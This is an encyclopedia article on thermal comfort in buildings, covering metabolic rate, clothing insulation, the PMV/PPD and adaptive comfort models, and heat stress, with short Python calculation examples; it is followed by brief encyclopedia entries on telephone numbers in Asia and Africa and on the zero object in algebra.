Satisfaction with the thermal environment is important because thermal conditions are potentially life-threatening for humans if the core body temperature reaches conditions of hyperthermia, above 37.5–38.3 °C (99.5–100.9 °F), or hypothermia, below 35.0 °C (95.0 °F). Buildings modify the conditions of the external environment and reduce the effort that the human body needs to make in order to stay at a stable, normal human body temperature, which is important for the correct functioning of human physiological processes. The Roman writer Vitruvius actually linked this purpose to the birth of architecture. David Linden also suggests that the reason we associate tropical beaches with paradise is that those environments are the ones in which human bodies need the least metabolic effort to maintain their core temperature.
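The thermal-neutrality condition described above is commonly written as a steady-state heat balance on the body (a sketch of the standard building-science form; the symbols follow common convention rather than any single standard's notation):

M - W = C + R + E_{sk} + (C_{res} + E_{res}) + S,

where M is the metabolic rate, W the external mechanical work, C and R the convective and radiative heat losses from the skin, E_{sk} the evaporative heat loss from the skin, C_{res} and E_{res} the convective and evaporative losses from respiration, and S the rate of heat storage in the body. Thermal neutrality corresponds to S = 0: the heat generated by metabolism exactly balances the heat dissipated to the surroundings.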
Temperature not only supports human life; coolness and warmth have also become in different cultures a symbol of protection, community and even the sacred. In building science studies, thermal comfort has been related to productivity and health. Office workers who are satisfied with their thermal environment are more productive. The combination of high temperature and high relative humidity reduces thermal comfort and indoor air quality. Although a single static temperature can be comfortable, people are attracted by thermal changes, such as campfires and cool pools. Thermal pleasure is caused by varying thermal sensations from a state of unpleasantness to a state of pleasantness, and the scientific term for it is positive thermal alliesthesia. From a state of thermal neutrality or comfort any change will be perceived as unpleasant. This challenges the assumption that mechanically controlled buildings should deliver uniform temperatures and comfort, if it is at the cost of excluding thermal pleasure. Influencing factors Since there are large variations from person to person in terms of physiological and psychological satisfaction, it is hard to find an optimal temperature for everyone in a given space. Laboratory and field data have been collected to define conditions that will be found comfortable for a specified percentage of occupants. There are numerous factors that directly affect thermal comfort that can be grouped in two categories: Personal factors – characteristics of the occupants such as metabolic rate and clothing level Environmental factors – which are conditions of the thermal environment, specifically air temperature, mean radiant temperature, air speed and humidity Even if all these factors may vary with time, standards usually refer to a steady state to study thermal comfort, just allowing limited temperature variations. Personal factors Metabolic rate People have different metabolic rates that can fluctuate due to activity level and environmental conditions. ASHRAE 55-2017 defines metabolic rate as the rate of transformation of chemical energy into heat and mechanical work by metabolic activities of an individual, per unit of skin surface area. Metabolic rate is expressed in units of met, equal to 58.2 W/m² (18.4 Btu/h·ft²). One met is equal to the energy produced per unit surface area of an average person seated at rest. ASHRAE 55 provides a table of metabolic rates for a variety of activities. Some common values are 0.7 met for sleeping, 1.0 met for a seated and quiet position, 1.2–1.4 met for light activities standing, 2.0 met or more for activities that involve movement, walking, lifting heavy loads or operating machinery. For intermittent activity, the standard states that it is permissible to use a time-weighted average metabolic rate if individuals are performing activities that vary over a period of one hour or less. For longer periods, different metabolic rates must be considered. According to ASHRAE Handbook of Fundamentals, estimating metabolic rates is complex, and for levels above 2 or 3 met – especially if there are various ways of performing such activities – the accuracy is low. Therefore, the standard is not applicable for activities with an average level higher than 2 met. Met values can also be determined more accurately than the tabulated ones, using an empirical equation that takes into account the rate of respiratory oxygen consumption and carbon dioxide production. 
Another physiological yet less accurate method is related to the heart rate, since there is a relationship between the latter and oxygen consumption. The Compendium of Physical Activities is used by physicians to record physical activities. It has a different definition of met, namely the ratio of the metabolic rate of the activity in question to a resting metabolic rate. As the formulation of the concept is different from the one that ASHRAE uses, these met values cannot be used directly in PMV calculations, but they open up a new way of quantifying physical activities. Food and drink habits may have an influence on metabolic rates, which indirectly influences thermal preferences. These effects may change depending on food and drink intake. Body shape is another factor that affects metabolic rate and hence thermal comfort. Heat dissipation depends on body surface area. The surface area of an average person is 1.8 m2 (19 ft2). A tall and skinny person has a larger surface-to-volume ratio, can dissipate heat more easily, and can tolerate higher temperatures better than a person with a rounded body shape.

Clothing insulation

The amount of thermal insulation worn by a person has a substantial impact on thermal comfort, because it influences the heat loss and consequently the thermal balance. Layers of insulating clothing prevent heat loss and can either help keep a person warm or lead to overheating. Generally, the thicker the garment is, the greater insulating ability it has. Depending on the type of material the clothing is made out of, air movement and relative humidity can decrease the insulating ability of the material. 1 clo is equal to 0.155 m2·K/W (0.88 °F·ft2·h/Btu). This corresponds to trousers, a long-sleeved shirt, and a jacket. Clothing insulation values for other common ensembles or single garments can be found in ASHRAE 55.

Skin wetness

Skin wetness is defined as "the proportion of the total skin surface area of the body covered with sweat". The wetness of skin in different areas also affects perceived thermal comfort. Humidity can increase wetness in different areas of the body, leading to a perception of discomfort. This is usually localized in different parts of the body, and local thermal comfort limits for skin wetness differ by location on the body. The extremities are much more sensitive to thermal discomfort from wetness than the trunk of the body. Although local thermal discomfort can be caused by wetness, the thermal comfort of the whole body will not be affected by the wetness of certain parts.

Environmental factors

Air temperature

The air temperature is the average temperature of the air surrounding the occupant, with respect to location and time. According to the ASHRAE 55 standard, the spatial average takes into account the ankle, waist and head levels, which vary for seated or standing occupants. The temporal average is based on three-minute intervals with at least 18 equally spaced points in time. Air temperature is measured with a dry-bulb thermometer, and for this reason it is also known as dry-bulb temperature.

Mean radiant temperature

The radiant temperature is related to the amount of radiant heat transferred from a surface, and it depends on the material's ability to absorb or emit heat, or its emissivity. The mean radiant temperature depends on the temperatures and emissivities of the surrounding surfaces as well as the view factor, or the amount of the surface that is "seen" by the object.
So the mean radiant temperature experienced by a person in a room with the sunlight streaming in varies based on how much of their body is in the sun.

Air speed

Air speed is defined as the rate of air movement at a point, without regard to direction. According to ANSI/ASHRAE Standard 55, it is the average speed of the air surrounding a representative occupant, with respect to location and time. The spatial average is for three heights as defined for average air temperature. For an occupant moving in a space, the sensors shall follow the movements of the occupant. The air speed is averaged over an interval not less than one and not greater than three minutes. Variations that occur over a period greater than three minutes shall be treated as multiple different air speeds.

Relative humidity

Relative humidity (RH) is the ratio of the amount of water vapor in the air to the amount of water vapor that the air could hold at the specific temperature and pressure. While the human body has thermoreceptors in the skin that enable perception of temperature, relative humidity is detected indirectly. Sweating is an effective heat loss mechanism that relies on evaporation from the skin. However, at high RH, the air holds close to the maximum water vapor that it can hold, so evaporation, and therefore heat loss, is decreased. On the other hand, very dry environments (RH < 20–30%) are also uncomfortable because of their effect on the mucous membranes. The recommended level of indoor humidity is in the range of 30–60% in air-conditioned buildings, but new standards such as the adaptive model allow lower and higher humidity, depending on the other factors involved in thermal comfort. Recently, the effects of low relative humidity and high air velocity were tested on humans after bathing. Researchers found that low relative humidity engendered thermal discomfort as well as the sensation of dryness and itching. It is recommended to keep relative humidity levels higher in a bathroom than in other rooms in the house for optimal conditions. Various types of apparent temperature have been developed to combine air temperature and air humidity. For higher temperatures, there are quantitative scales, such as the heat index. For lower temperatures, a related interplay was identified only qualitatively: high humidity and low temperatures cause the air to feel chilly. Cold air with high relative humidity "feels" colder than dry air of the same temperature because high humidity in cold weather increases the conduction of heat from the body. There has been controversy over why damp cold air feels colder than dry cold air. Some believe it is because when the humidity is high, our skin and clothing become moist and are better conductors of heat, so there is more cooling by conduction. The influence of humidity can be exacerbated with the combined use of fans (forced convection cooling).

Natural ventilation

Many buildings use an HVAC unit to control their thermal environment. Other buildings are naturally ventilated (or use cross ventilation) and do not rely on mechanical systems to provide thermal comfort. Depending on the climate, this can drastically reduce energy consumption. It is sometimes seen as a risk, though, since indoor temperatures can be too extreme if the building is poorly designed. Properly designed, naturally ventilated buildings keep indoor conditions within the range where opening windows and using fans in the summer, and wearing extra clothing in the winter, can keep people thermally comfortable.
Models and indices

There are several models or indices that can be used to assess indoor thermal comfort conditions, as described below.

PMV/PPD method

The PMV/PPD model was developed by P.O. Fanger using heat-balance equations and empirical studies of skin temperature to define comfort. Standard thermal comfort surveys ask subjects about their thermal sensation on a seven-point scale from cold (−3) to hot (+3). Fanger's equations are used to calculate the predicted mean vote (PMV) of a group of subjects for a particular combination of air temperature, mean radiant temperature, relative humidity, air speed, metabolic rate, and clothing insulation. A PMV of zero represents thermal neutrality, and the comfort zone is defined by the combinations of the six parameters for which the PMV is within the recommended limits. Although predicting the thermal sensation of a population is an important step in determining what conditions are comfortable, it is more useful to consider whether or not people will be satisfied. Fanger developed another equation to relate the PMV to the Predicted Percentage of Dissatisfied (PPD). This relation was based on studies that surveyed subjects in a chamber where the indoor conditions could be precisely controlled. The PMV/PPD model is applied globally but does not directly take into account adaptation mechanisms or outdoor thermal conditions. ASHRAE Standard 55-2017 uses the PMV model to set the requirements for indoor thermal conditions; it requires that at least 80% of the occupants be satisfied. The CBE Thermal Comfort Tool for ASHRAE 55 allows users to input the six comfort parameters to determine whether a certain combination complies with ASHRAE 55. The results are displayed on a psychrometric or a temperature–relative humidity chart and indicate the ranges of temperature and relative humidity that will be comfortable given the values input for the remaining four parameters. The PMV/PPD model has low prediction accuracy: using the world's largest thermal comfort field-survey database, the accuracy of PMV in predicting occupants' thermal sensation was only 34%, meaning that thermal sensation is correctly predicted about one time in three. The PPD also overestimated subjects' thermal unacceptability outside the thermal neutrality range (−1 ≤ PMV ≤ 1), and the PMV/PPD accuracy varies strongly between ventilation strategies, building types, and climates.

Elevated air speed method

ASHRAE 55-2013 treats air speeds above a given threshold separately from the baseline model. Because air movement can provide direct cooling to people, particularly if they are not wearing much clothing, higher temperatures can be more comfortable than the PMV model predicts. Air speeds up to a specified limit are allowed without local control, and 1.2 m/s is possible with local control. This elevated air movement increases the maximum temperature for an office space in the summer from 27.5 °C to 30 °C.
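Both the baseline PMV/PPD method and the elevated-air-speed adjustment ultimately report dissatisfaction through Fanger's closed-form PMV-to-PPD relation, as published in ISO 7730. A minimal Python sketch:

import math

def ppd_from_pmv(pmv):
    # Fanger's curve: dissatisfaction never falls below 5%, even at PMV = 0.
    return 100 - 95 * math.exp(-0.03353 * pmv ** 4 - 0.2179 * pmv ** 2)

print(round(ppd_from_pmv(0.0), 1))  # 5.0
print(round(ppd_from_pmv(1.0), 1))  # ~26, i.e. roughly a quarter dissatisfied

The built-in 5% floor at thermal neutrality is one reason standards target a percentage of satisfied occupants rather than unanimity.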
Virtual Energy for Thermal Comfort

"Virtual Energy for Thermal Comfort" is the amount of energy that would be required to make a non-air-conditioned building as comfortable as one with air conditioning, on the assumption that the home will eventually install air conditioning or heating. Passive design improves thermal comfort in a building, thus reducing demand for heating or cooling. In many developing countries, most occupants do not currently heat or cool their homes, owing to economic constraints as well as climates that are borderline for comfort, such as cold winter nights in Johannesburg (South Africa) or warm summer days in San Jose, Costa Rica. At the same time, as incomes rise, there is a strong tendency to introduce cooling and heating systems. If we recognize and reward passive design features that improve thermal comfort today, we diminish the risk of having to install HVAC systems in the future, or we at least ensure that such systems will be smaller and less frequently used. And where a heating or cooling system is never installed because of cost, occupants should at least not suffer from indoor discomfort. To provide an example: in San Jose, Costa Rica, if a house were designed with a high level of glazing and small opening sizes, the internal temperature would easily rise above the comfort range, and natural ventilation would not be enough to remove the internal heat gains and solar gains. This is why Virtual Energy for Comfort is important. The World Bank's assessment tool, the EDGE software (Excellence in Design for Greater Efficiencies), illustrates the potential discomfort issues in buildings and introduced the concept of Virtual Energy for Comfort as a way to present potential thermal discomfort. This approach is used to reward design solutions that improve thermal comfort even in a fully free-running building. Although CIBSE guidance includes requirements for overheating, overcooling has not been assessed. However, overcooling can be an issue, mainly in the developing world, for example in cities such as Lima (Peru), Bogota, and Delhi, where cooler indoor temperatures can occur frequently. This may be a new area for research and design guidance aimed at reducing discomfort.

Cooling Effect

ASHRAE 55-2017 defines the Cooling Effect (CE) at elevated air speed as the value that, when subtracted from both the air temperature and the mean radiant temperature, yields the same SET value under still air (0.1 m/s) as the SET calculated under the elevated air speed. The CE can be used to determine the PMV adjusted for an environment with elevated air speed, using the adjusted air temperature, the adjusted radiant temperature, and still air (0.1 m/s), where the adjusted temperatures are equal to the original air and mean radiant temperatures minus the CE.

Local thermal discomfort

Avoiding local thermal discomfort, whether caused by a vertical air temperature difference between the feet and the head, by an asymmetric radiant field, by local convective cooling (draft), or by contact with a hot or cold floor, is essential to providing acceptable thermal comfort. People are generally more sensitive to local discomfort when their thermal sensation is cooler than neutral, and less sensitive to it when their body is warmer than neutral.

Radiant temperature asymmetry

Large differences in the thermal radiation of the surfaces surrounding a person may cause local discomfort or reduce acceptance of the thermal conditions. ASHRAE Standard 55 sets limits on the allowable temperature differences between various surfaces. Because people are more sensitive to some asymmetries than others, for example that of a warm ceiling versus that of hot and cold vertical surfaces, the limits depend on which surfaces are involved: the allowed excess is much smaller for a warm ceiling than for a warm wall.
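Because the Cooling Effect defined above is specified implicitly (the CE is whatever offset makes the still-air SET match the elevated-air-speed SET), it is naturally computed by a root search. A sketch, written to accept any SET function such as set_tmp from the pythermalcomfort package; the search bounds and iteration count are assumptions, not values from the standard:

def cooling_effect(tdb, tr, v, rh, met, clo, set_tmp):
    # Bisection for CE: find the offset that makes SET at still air (0.1 m/s),
    # with both temperatures lowered by CE, equal SET at the elevated speed v.
    target = set_tmp(tdb, tr, v, rh, met, clo)
    lo, hi = 0.0, 15.0  # search interval in kelvin (an assumption)
    for _ in range(50):
        ce = (lo + hi) / 2
        if set_tmp(tdb - ce, tr - ce, 0.1, rh, met, clo) > target:
            lo = ce  # still-air SET still too high: more cooling effect needed
        else:
            hi = ce
    return (lo + hi) / 2

Passing the SET function in as a parameter keeps the sketch self-contained while leaving the choice of SET implementation open.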
Draft

While air movement can be pleasant and provide comfort in some circumstances, it is sometimes unwanted and causes discomfort. This unwanted air movement is called "draft" and is most prevalent when the thermal sensation of the whole body is cool. People are most likely to feel a draft on uncovered body parts such as the head, neck, shoulders, ankles, feet, and legs, but the sensation also depends on the air speed, air temperature, activity, and clothing.

Floor surface temperature

Floors that are too warm or too cool may cause discomfort, depending on footwear. ASHRAE 55 recommends a range of floor temperatures for spaces where occupants will be wearing lightweight shoes.

Standard effective temperature

Standard effective temperature (SET) is a model of human response to the thermal environment. Developed by A.P. Gagge and accepted by ASHRAE in 1986, it is also referred to as the Pierce Two-Node model. Its calculation is similar to PMV in that it is a comprehensive comfort index based on heat-balance equations that incorporates the personal factors of clothing and metabolic rate. Its fundamental difference is that it takes a two-node approach to human physiology, modeling skin temperature and skin wettedness. The SET index is defined as the equivalent dry-bulb temperature of an isothermal environment at 50% relative humidity in which a subject, wearing clothing standardized for the activity concerned, would have the same heat stress (skin temperature) and thermoregulatory strain (skin wettedness) as in the actual test environment. Research has tested the model against experimental data and found that it tends to overestimate skin temperature and underestimate skin wettedness. Fountain and Huizenga (1997) developed a thermal sensation prediction tool that computes SET. The SET index can also be calculated using the CBE Thermal Comfort Tool for ASHRAE 55, the Python package pythermalcomfort, or the R package comf.

Adaptive comfort model

The adaptive model is based on the idea that the outdoor climate can serve as a proxy for indoor comfort because of a statistically significant correlation between them. The adaptive hypothesis predicts that contextual factors, such as access to environmental controls, and past thermal history can influence building occupants' thermal expectations and preferences. Numerous researchers have conducted field studies worldwide in which they survey building occupants about their thermal comfort while taking simultaneous environmental measurements. Analysis of a database of results from 160 of these buildings revealed that occupants of naturally ventilated buildings accept and even prefer a wider range of temperatures than their counterparts in sealed, air-conditioned buildings, because their preferred temperature depends on outdoor conditions. These results were incorporated in the ASHRAE 55-2004 standard as the adaptive comfort model. The adaptive chart relates indoor comfort temperature to prevailing outdoor temperature and defines zones of 80% and 90% satisfaction. The ASHRAE 55-2010 standard introduced the prevailing mean outdoor temperature as the input variable for the adaptive model. It is based on the arithmetic average of the mean daily outdoor temperatures over no fewer than 7 and no more than 30 sequential days prior to the day in question. It can also be calculated by weighting the daily temperatures with different coefficients, assigning increasing importance to the most recent days.
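A Python sketch of both calculations: an exponentially weighted running mean of outdoor temperature (the decay constant alpha = 0.8 is a typical choice, an assumption here) fed into the ASHRAE 55 adaptive relation between neutral indoor temperature and prevailing mean outdoor temperature:

def prevailing_mean_outdoor(daily_means_c, alpha=0.8):
    # Exponentially weighted running mean: recent days count more.
    # daily_means_c is ordered oldest first, in °C.
    t_rm = daily_means_c[0]
    for t in daily_means_c[1:]:
        t_rm = (1 - alpha) * t + alpha * t_rm
    return t_rm

def adaptive_comfort_ashrae55(t_prevailing_c):
    # Neutral temperature and the 80% acceptability band (±3.5 K).
    t_comf = 0.31 * t_prevailing_c + 17.8
    return t_comf - 3.5, t_comf, t_comf + 3.5

print(adaptive_comfort_ashrae55(prevailing_mean_outdoor([18, 20, 22, 25, 24])))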
Where this weighting is used, there is no need to respect the upper limit on the number of days. In order to apply the adaptive model, there should be no mechanical cooling system for the space, occupants should be engaged in sedentary activities with metabolic rates of 1–1.3 met, and the prevailing mean temperature must lie within the range covered by the standard. This model applies especially to occupant-controlled, naturally conditioned spaces, where the outdoor climate can actually affect the indoor conditions and hence the comfort zone. Indeed, studies by de Dear and Brager showed that occupants in naturally ventilated buildings tolerated a wider range of temperatures. This is due to both behavioral and physiological adjustments, since there are several types of adaptive processes. ASHRAE Standard 55-2010 states that differences in recent thermal experiences, changes in clothing, availability of control options, and shifts in occupant expectations can change people's thermal responses. Adaptive models of thermal comfort are implemented in other standards, such as the European standard EN 15251 and ISO 7730. While the exact derivation methods and results differ slightly from the ASHRAE 55 adaptive standard, they are substantially the same. A larger difference lies in applicability: the ASHRAE adaptive standard applies only to buildings without mechanical cooling installed, whereas EN 15251 can be applied to mixed-mode buildings, provided the system is not running. There are basically three categories of thermal adaptation: behavioral, physiological, and psychological.

Psychological adaptation

An individual's comfort level in a given environment may change and adapt over time due to psychological factors. Subjective perception of thermal comfort may be influenced by the memory of previous experiences. Habituation takes place when repeated exposure moderates future expectations and responses to sensory input. This is an important factor in explaining the difference between field observations and PMV predictions (based on the static model) in naturally ventilated buildings, where the relationship with outdoor temperatures has been twice as strong as predicted. Psychological adaptation is treated subtly differently in the static and adaptive models. Laboratory tests of the static model can identify and quantify non-heat-transfer (psychological) factors that affect reported comfort, whereas the adaptive model is limited to reporting differences (called psychological) between modeled and reported comfort. Thermal comfort as a "condition of mind" is defined in psychological terms. Among the factors that affect the condition of mind (in the laboratory) are a sense of control over the temperature, knowledge of the temperature, and the appearance of the (test) environment. A thermal test chamber that appeared residential "felt" warmer than one that looked like the inside of a refrigerator.

Physiological adaptation

The body has several thermal adjustment mechanisms for surviving drastic temperature environments. In a cold environment, the body uses vasoconstriction, which reduces blood flow to the skin and thereby skin temperature and heat dissipation. In a warm environment, vasodilation increases blood flow to the skin, heat transport, skin temperature, and heat dissipation. If an imbalance remains despite these vasomotor adjustments, sweat production will start in a warm environment and provide evaporative cooling.
If this is insufficient, hyperthermia will set in, body temperature may rise dangerously, and heat stroke may occur. In a cold environment, shivering will start, involuntarily forcing the muscles to work and increasing heat production by up to a factor of 10. If equilibrium is not restored, hypothermia can set in, which can be fatal. Long-term adjustments to extreme temperatures, over a few days to six months, may result in cardiovascular and endocrine adjustments. A hot climate may produce increased blood volume, improving the effectiveness of vasodilation, enhanced performance of the sweat mechanism, and a readjustment of thermal preferences. In cold or underheated conditions, vasoconstriction can become permanent, resulting in decreased blood volume and an increased body metabolic rate.

Behavioral adaptation

In naturally ventilated buildings, occupants take numerous actions to keep themselves comfortable when the indoor conditions drift towards discomfort. Operating windows and fans, adjusting blinds and shades, changing clothing, and consuming food and drinks are some of the common adaptive strategies; among these, adjusting windows is the most common. Occupants who take these sorts of actions tend to feel cooler at warmer temperatures than those who do not. Behavioral actions significantly influence energy simulation inputs, and researchers are developing behavior models to improve the accuracy of simulation results. For example, many window-opening models have been developed to date, but there is no consensus over the factors that trigger window opening. People might also adapt to seasonal heat by becoming more nocturnal, doing physical activity and even conducting business at night.

Specificity and sensitivity

Individual differences

The thermal sensitivity of an individual is quantified by the descriptor FS, which takes on higher values for individuals with lower tolerance to non-ideal thermal conditions. This group includes pregnant women, the disabled, and individuals younger than fourteen or older than sixty (fourteen to sixty being taken as the adult range). Existing literature provides consistent evidence that sensitivity to hot and cold surfaces usually declines with age. There is also some evidence of a gradual reduction in the effectiveness of the body's thermoregulation after the age of sixty, mainly due to a more sluggish response of the counteracting mechanisms in the lower parts of the body that are used to maintain the body's core temperature at its ideal value. Seniors prefer warmer temperatures than young adults (76 vs 72 °F, or 24.4 vs 22.2 °C). Situational factors include the health, psychological, sociological, and vocational activities of the persons.

Biological sex differences

While thermal comfort preferences between the sexes seem to be small, there are some average differences. Studies have found that males on average report discomfort due to rises in temperature much earlier than females. Males on average also report higher levels of discomfort than females. One recent study tested males and females in the same cotton clothing, performing mental tasks while using a dial vote to report their thermal comfort as the temperature changed. Many times, females preferred higher temperatures than males. But while females tend to be more sensitive to temperature, males tend to be more sensitive to relative humidity.
An extensive field study was carried out in naturally ventilated residential buildings in Kota Kinabalu, Sabah, Malaysia. This investigation explored the sexes' thermal sensitivity to the indoor environment in non-air-conditioned residential buildings. Multiple hierarchical regression with a categorical moderator was used for the analysis; the results showed that, as a group, females were slightly more sensitive than males to indoor air temperature, whereas under thermal neutrality males and females reported similar thermal sensations.

Regional differences

In different areas of the world, thermal comfort needs may vary with climate. China has hot, humid summers and cold winters, creating a strong need for energy-efficient thermal comfort. Energy conservation in relation to thermal comfort has become a major issue in China over the last several decades owing to rapid economic and population growth, and researchers are now looking into ways to heat and cool buildings in China at lower cost and with less harm to the environment. In tropical areas of Brazil, urbanization is creating urban heat islands (UHI): urban areas that have risen above the thermal comfort limits due to a large influx of people, dropping back into the comfortable range only during the rainy season. Urban heat islands can occur over any urban city or built-up area given the right conditions. In the hot, humid region of Saudi Arabia, the issue of thermal comfort has been important in mosques; because they are very large open buildings used only intermittently (very busy for the noon prayer on Fridays), they are hard to ventilate properly. Their large size requires a large amount of ventilation, which takes a lot of energy given that the buildings are used only for short periods. Temperature regulation in mosques is thus a challenge, leading to many mosques being either too hot or too cold. The stack effect also comes into play: their great height creates a large layer of hot air above the people in the mosque. New designs have placed the ventilation systems lower in the buildings to provide more temperature control at ground level, and new monitoring steps are being taken to improve efficiency.

Thermal stress

The concept of thermal comfort is closely related to thermal stress, which attempts to predict the impact of solar radiation, air movement, and humidity on, for example, military personnel undergoing training exercises or athletes during competitive events. Several thermal stress indices have been proposed, such as the Predicted Heat Strain (PHS) or the humidex. Generally, humans do not perform well under thermal stress: people's performance under thermal stress is about 11% lower than under normal thermal conditions, and performance also varies greatly with the type of task being performed. Some of the physiological effects of heat stress include increased blood flow to the skin, sweating, and increased ventilation.

Predicted Heat Strain (PHS)

The PHS model, developed by an International Organization for Standardization (ISO) committee, allows the analytical evaluation of the thermal stress experienced by a working subject in a hot environment. It describes a method for predicting the sweat rate and the internal core temperature that the human body will develop in response to the working conditions.
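A hedged sketch of evaluating the PHS with the Python package pythermalcomfort (mentioned below for this purpose). The argument names, units (metabolic rate in W/m2), posture encoding, and return fields follow that package's documented interface as I understand it and should be checked against the installed version:

from pythermalcomfort.models import phs

# 35 °C air and radiant temperature, light air movement, 60% RH,
# moderate work rate (met in W/m2), light clothing, standing posture.
result = phs(tdb=35, tr=35, v=0.3, rh=60, met=150, clo=0.5, posture=2)
print(result)  # includes predicted core temperature and water loss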
The PHS is calculated as a function of several physical parameters; consequently, it makes it possible to determine which parameter or group of parameters should be modified, and to what extent, in order to reduce the risk of physiological strain. The PHS model does not predict the physiological response of an individual subject, but only considers standard subjects in good health and fit for the work they perform. The PHS can be determined using either the Python package pythermalcomfort or the R package comf.

American Conference of Governmental Industrial Hygienists (ACGIH) Action Limits and Threshold Limit Values

ACGIH has established Action Limits and Threshold Limit Values for heat stress based upon the estimated metabolic rate of a worker and the environmental conditions the worker is subjected to. This methodology has been adopted by the Occupational Safety and Health Administration (OSHA) as an effective method of assessing heat stress in workplaces.

Research

The factors affecting thermal comfort were explored experimentally in the 1970s. Many of these studies led to the development and refinement of ASHRAE Standard 55 and were performed at Kansas State University by Ole Fanger and others. Perceived comfort was found to be a complex interaction of these variables. It was found that the majority of individuals would be satisfied by an ideal set of values; as the values deviated progressively from the ideal, fewer and fewer people were satisfied. This observation could be expressed statistically as the percentage of individuals who expressed satisfaction with the comfort conditions and as the predicted mean vote (PMV). This approach was challenged by the adaptive comfort model, developed from the ASHRAE 884 project, which revealed that occupants were comfortable in a broader range of temperatures. This research is applied to create Building Energy Simulation (BES) programs for residential buildings. Residential buildings in particular can vary much more in thermal comfort than public and commercial buildings, owing to their smaller size, the variation in clothing worn, and the different uses of each room. The main rooms of concern are bathrooms and bedrooms: bathrooms need to be at a temperature comfortable for a person with or without clothing, while bedrooms need to accommodate different levels of clothing and the different metabolic rates of people asleep or awake. Discomfort hours is a common metric used to evaluate the thermal performance of a space. Thermal comfort research in clothing is currently being done by the military: new air-ventilated garments are being researched to improve evaporative cooling in military settings, and models are being created and tested based on the amount of cooling they provide. In the last twenty years, researchers have also developed advanced thermal comfort models that divide the human body into many segments and predict local thermal discomfort by considering heat balance. This has opened up a new arena of thermal comfort modeling that aims at heating or cooling selected body parts. Another area of study is the hue-heat hypothesis, which states that an environment with warm colors (red, orange, and yellow hues) will feel warmer in terms of temperature and comfort, while an environment with cold colors (blue and green hues) will feel cooler.
The hue-heat hypothesis has been both investigated scientifically and ingrained in popular culture, in the terms warm and cold colors.

Medical environments

Where the studies referenced here have discussed the thermal conditions for different groups of occupants in one room, they have ended up simply presenting comparisons of thermal comfort satisfaction based on subjective surveys. No study has tried to reconcile the different thermal comfort requirements of different types of occupants who must share one room. It therefore appears necessary to investigate the thermal conditions required by different groups of occupants in hospitals and to reconcile their differing requirements. To reconcile these differences, it is recommended to test the possibility of using different ranges of local radiant temperature within one room via a suitable mechanical system. Although various studies have been undertaken on thermal comfort for patients in hospitals, it is also necessary to study the effects of thermal comfort conditions on the quality and rate of healing of patients. There is also original research showing the link between staff thermal comfort and productivity, but no studies of this kind have been produced specifically in hospitals; research on suitable coverage and methods for this subject is therefore recommended. Research on cooling and heating delivery systems for patients with weakened immune systems (such as HIV patients or burn patients) is also recommended. Important areas that still need attention include thermal comfort for staff and its relation to their productivity, and the use of different heating systems to prevent hypothermia in the patient while simultaneously improving thermal comfort for hospital staff. Finally, the interaction between people, systems, and architectural design in hospitals is a field that requires further work to improve knowledge of how to design buildings and systems that reconcile the many conflicting factors affecting the people occupying them.

Personal comfort systems

Personal comfort systems (PCS) refer to devices or systems that heat or cool a building occupant personally. This concept is best appreciated in contrast to central HVAC systems, which apply uniform temperature settings over extensive areas. Personal comfort systems include fans and air diffusers of various kinds (e.g. desk fans, nozzles and slot diffusers, overhead fans, high-volume low-speed fans) and personalized sources of radiant or conductive heat (foot warmers, leg warmers, hot water bottles, etc.). PCS has the potential to satisfy individual comfort requirements much better than current HVAC systems, as interpersonal differences in thermal sensation due to age, sex, body mass, metabolic rate, clothing, and thermal adaptation can amount to an equivalent temperature variation of 2–5 °C (3.6–9 °F), which is impossible for a central, uniform HVAC system to cater to. Moreover, research has shown that the perceived ability to control one's thermal environment tends to widen one's range of tolerable temperatures. Traditionally, PCS devices have been used in isolation from one another. However, it has been proposed by Andersen et al.
(2016) that a network of PCS devices that generate well-connected microzones of thermal comfort, report real-time occupant information, and respond to programmatic actuation requests (e.g. for a party, a conference, or a concert) could be combined with occupant-aware building applications to enable new methods of comfort maximization.

See also

ASHRAE
ANSI/ASHRAE Standard 55
Air conditioning
Building insulation
Cold and heat adaptations in humans
Heat stress
Mean radiant temperature
Mahoney tables
Povl Ole Fanger
Psychrometrics
Ralph G. Nevins
Room air distribution
Room temperature
Ventilative cooling

References

Further reading

Fanger, P. O., Thermal Comfort, Danish Technical Press, 1970 (republished by McGraw-Hill, New York, 1973).
"Thermal Comfort" chapter, Fundamentals volume of the ASHRAE Handbook, ASHRAE, Inc., Atlanta, GA, 2005.
Godish, T., Indoor Environmental Quality, Boca Raton: CRC Press, 2001.
Bessoudo, M., Building Facades and Thermal Comfort: The impacts of climate, solar shading, and glazing on the indoor thermal environment, VDM Verlag, 2008.
Communications in Development and Assembly of Textile Products, open-access journal, ISSN 2701-939X.
Heat Stress, National Institute for Occupational Safety and Health.
Cold Stress, National Institute for Occupational Safety and Health.

Heating, ventilation, and air conditioning
Building engineering
Temperature
Heat transfer
Environmental psychology
Occupational safety and health
Thermal comfort
[ "Physics", "Chemistry", "Engineering", "Environmental_science" ]
8,072
[ "Transport phenomena", "Scalar physical quantities", "Thermodynamic properties", "Temperature", "Physical phenomena", "Physical quantities", "Heat transfer", "Environmental psychology", "Building engineering", "SI base quantities", "Intensive quantities", "Civil engineering", "Thermodynamics...
7,455,679
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Asia
Telephone numbers in Asia begin with more distinct leading digits than those of any other continent: 2, 3, 6, 7, 8, and 9. Below is a list of country calling codes for various states and territories in Asia.

States and territories with country calling codes

States and territories without a separate country calling code

See also

Telephone numbering plan
National conventions for writing telephone numbers
List of country calling codes
List of international call prefixes

Communications in Asia
International telecommunications
Telecommunications in Asia
Telephone numbers
Telephone numbers in Asia
[ "Mathematics" ]
94
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,708
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Africa
The following are country calling codes in Africa.

States and territories with country calling codes

States and territories without a country calling code

References

Communications in Africa
International telecommunications
Telephone numbers
Telecommunications in Africa
Telephone numbers in Africa
[ "Mathematics" ]
37
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,889
https://en.wikipedia.org/wiki/Zero%20object%20%28algebra%29
In algebra, the zero object of a given algebraic structure is, in the sense explained below, the simplest object of that structure. As a set it is a singleton, and as a magma it has a trivial structure, which is also that of an abelian group. This abelian group structure is usually identified as addition, and the only element is called zero, so the object itself is typically denoted as {0}. One often refers to the trivial object (of a specified category), since every trivial object is isomorphic to any other (under a unique isomorphism). Instances of the zero object include, but are not limited to, the following:

As a group, the zero group or trivial group.
As a ring, the zero ring or trivial ring.
As an algebra over a field or algebra over a ring, the trivial algebra.
